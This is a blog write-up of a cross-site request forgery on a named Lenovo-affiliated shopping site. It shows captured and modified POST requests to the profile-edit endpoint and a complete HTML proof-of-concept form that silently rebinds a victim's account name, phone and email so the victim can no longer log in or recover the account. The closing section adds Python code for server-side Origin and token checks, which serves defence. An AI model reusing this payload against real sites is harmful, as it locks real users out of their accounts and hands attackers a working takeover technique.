A combined CSRF at a Lenovo site

1. Open the URL http://www.enjoy3c.com/getMyInfo.do


2. Click Confirm and capture the traffic; the captured request is as follows:

POST /editMyInfo.do HTTP/1.1
Host: www.enjoy3c.com
Content-Length: 124
Cache-Control: max-age=0
Origin: http://www.enjoy3c.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://www.enjoy3c.com/getMyInfo.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 

account=lalala&loginMobile=13688888888&loginEmail=1900065568%40qq.com&realName=11&identityCard=&birthday=&province=3&city=36

Because of a logic flaw here, the verification can be bypassed to bind an arbitrary phone number and an arbitrary email address, and these same fields (account name, phone number, email) are exactly what the login form asks for.

So all we have to do is change the email, phone number and account name to values the user cannot possibly know, and a user who clicks this CSRF PoC will no longer be able to log in to the site.

So, in the request above change account to only_free_2018, loginMobile to 110 and loginEmail to `admin@lenovo.com`; the modified request is as follows:

POST /editMyInfo.do HTTP/1.1
Host: www.enjoy3c.com
Content-Length: 124
Cache-Control: max-age=0
Origin: http://www.enjoy3c.com
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.99 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8
Referer: http://www.enjoy3c.com/getMyInfo.do
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: 
Connection: close

account=only_free_2018&loginMobile=110&loginEmail=admin@lenovo.com&realName=11&identityCard=&birthday=&province=3&city=36

3. Build it into a CSRF PoC

<html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://www.enjoy3c.com/editMyInfo.do" method="POST">
      <input type="hidden" name="account" value="only&#95;free&#95;2018" />
      <input type="hidden" name="loginMobile" value="110" />
      <input type="hidden" name="loginEmail" value="admin&#64;lenovo&#46;com" />
      <input type="hidden" name="realName" value="11" />
      <input type="hidden" name="identityCard" value="" />
      <input type="hidden" name="birthday" value="" />
      <input type="hidden" name="province" value="3" />
      <input type="hidden" name="city" value="36" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

4. Open this PoC in the browser.


The profile was successfully modified, and from this point on the user can no longer log in to the site, because I changed the login credentials. This is harsher than changing the password: after a password change the account can still be recovered via the phone number or email, but here not even the password can be recovered, and the user does not know what the phone number, email and account name have become~~
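The edit request above is accepted purely on the strength of the session cookie: nothing ties the submission to a form the site itself served. As an added example (not code from the original post or from the site), the check below shows what the server side of /editMyInfo.do would need: reject the request unless the Origin (or, failing that, Referer) header matches the site's own origin and the form carries a per-session token. The `csrf_token` field name, the `session` cookie name and the session store are assumptions; the captured request has neither.

```python
import hmac
import secrets
from http.cookies import SimpleCookie
from urllib.parse import parse_qs, urlsplit

SITE_ORIGIN = "http://www.enjoy3c.com"
TOKEN_FIELD = "csrf_token"  # assumed hidden-field name; the captured form has none
# Constructed session store: cookie "session" -> token the server embedded in the edit form.
SESSIONS = {"sid-abc": secrets.token_urlsafe(32)}


def parse_request(raw: str):
    """Split a raw HTTP/1.1 request into (lowercased headers, form fields)."""
    head, _, body = raw.partition("\r\n\r\n")
    headers = {}
    for line in head.split("\r\n")[1:]:  # skip the request line
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return headers, {k: v[0] for k, v in parse_qs(body, keep_blank_values=True).items()}


def same_origin(headers) -> bool:
    """Origin is authoritative; fall back to Referer; with neither (or 'null'), reject."""
    p = urlsplit(headers.get("origin") or headers.get("referer") or "")
    return f"{p.scheme}://{p.netloc}" == SITE_ORIGIN


def csrf_check(raw: str):
    """Return (accepted, reason) for a POST to a state-changing endpoint."""
    headers, form = parse_request(raw)
    if not same_origin(headers):
        return False, "cross-site Origin/Referer"
    jar = SimpleCookie()
    jar.load(headers.get("cookie", ""))
    expected = SESSIONS.get(jar["session"].value) if "session" in jar else None
    if expected is None:
        return False, "no valid session"
    # Constant-time compare: the token must be the one bound to this session.
    if not hmac.compare_digest(form.get(TOKEN_FIELD, ""), expected):
        return False, "missing or wrong CSRF token"
    return True, "accepted"


def build_request(origin: str, sid: str, token: str = "") -> str:
    """Constructed request carrying the same form fields as the captured packet."""
    body = ("account=only_free_2018&loginMobile=110&loginEmail=admin%40lenovo.com"
            "&realName=11&identityCard=&birthday=&province=3&city=36")
    body += f"&{TOKEN_FIELD}={token}" if token else ""
    return ("POST /editMyInfo.do HTTP/1.1\r\nHost: www.enjoy3c.com\r\n"
            f"Origin: {origin}\r\nCookie: session={sid}\r\n"
            "Content-Type: application/x-www-form-urlencoded\r\n\r\n" + body)
```

A browser submitting the PoC form from another page sends that page's Origin, so the first check alone already stops it; the token check additionally covers clients that omit Origin and Referer.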


Please credit when reprinting: only_free blog, "A combined CSRF at a Lenovo site"
